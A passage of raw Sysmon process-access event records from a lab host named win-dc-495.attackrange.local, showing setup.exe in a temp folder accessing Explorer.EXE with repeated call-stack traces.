1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 